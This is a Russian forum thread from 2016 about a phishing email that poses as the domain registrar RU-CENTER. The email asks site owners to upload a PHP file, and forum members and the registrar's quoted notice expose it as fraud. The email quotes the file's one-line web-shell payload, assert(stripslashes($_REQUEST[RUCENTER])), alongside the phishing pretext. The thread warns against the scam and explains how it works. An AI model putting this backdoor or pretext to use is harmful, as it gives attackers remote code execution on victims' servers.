Уважаемый клиент! В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора. Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файлa 7orru08fn0f81n.php со следующим содержимым: assert(stripslashes($_REQUEST[RUCENTER])); ?> Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена. Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Но залить файл с расширением PHP в корневую директорию не получается!!! Что делать!!!
Проектирование газоснабжения
Сообщение отредактировал Газовик - Воскресенье, 18 Дек 2016, 08:03:14
Газовик, предоставьте, пожалуйста, исходник письма. Как проверить заголовки полученных писем и анализ заголовков e-mail - //forum.ucoz.ru/forum/45-59689-1
https://www.nic.ru/dns/help/adm/id/ Для идентификации необходимо предоставлять электронные копии документов используя личный кабинет управления доменами. Также RU-CENTER может направить письмо со ссылкой, для проверки работы e-mail.
Газовик, да вирусяка это, не нужно ничего заливать. У меня уже за неделю стопка в спаме писем о том, что "завтра ваш домен будет заблокирован". Если есть сомнения - зайдите на сайт вашего регистратора доменов и посмотрите инфу там
Газовик, развод заключается в том, что вам предлагают создать файл на первый взгляд с безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной RUCENTER
Думаю, уже все в т.ч. топикстартер офицальное получили
Цитата
Уважаемый клиент!
Некоторые наши клиенты получили письма от имени RU-CENTER c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.
Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.
Чтобы не стать жертвой мошенничества:
обращайте внимание на адрес отправителя — наши уведомления приходят только с адресов на домене nic.ru;
убедитесь, что ваши контакты [url=http://nic.link.nic.ru/nic/30479,9bRq7AbgIs9zV-WR725KYA/11526,49808835,617134,?aHR0cHM6Ly93d3cubmljLnJ1L2Rucy9zZXJ2aWNlL3dob2lzcHJveHkvP2lwYXJ0bmVyPTQzNjkmYWR2X2lkPTE5MTIxNmZyYXVkc3RlcnNuZXJlemxpbmsxJnV0bV9zb3VyY2U9c2VydiZ1dG1fbWVkaXVtPWxpbmsxJnV0bV9jYW1wYWlnbj0xOTEyMTZmcmF1ZHN0ZXJzbmVyZXo=]не находятся в открытомдоступе[/url];
никогда не загружайте вложения и не устанавливайте внешние файлы;
после перехода по ссылке проверьте, что находитесь на сайте nic.ru, в адресной строке присутствует зеленый замок и сертификат JSC "RU-CENTER";
в случае малейших подозрений — уточняйте информацию в [url=http://nic.link.nic.ru/nic/30480,XLpzzqzijm1uRVL6Xl9JrA/11526,49808835,617134,?aHR0cHM6Ly93d3cubmljLnJ1L2Fib3V0L2NvbnRhY3RzLmh0bWw/aXBhcnRuZXI9NDM2OSZhZHZfaWQ9MTkxMjE2ZnJhdWRzdGVyc25lcmV6bGluazImdXRtX3NvdXJjZT1zZXJ2JnV0bV9tZWRpdW09bGluazImdXRtX2NhbXBhaWduPTE5MTIxNmZyYXVkc3RlcnNuZXJleg==]службе поддержки[/url].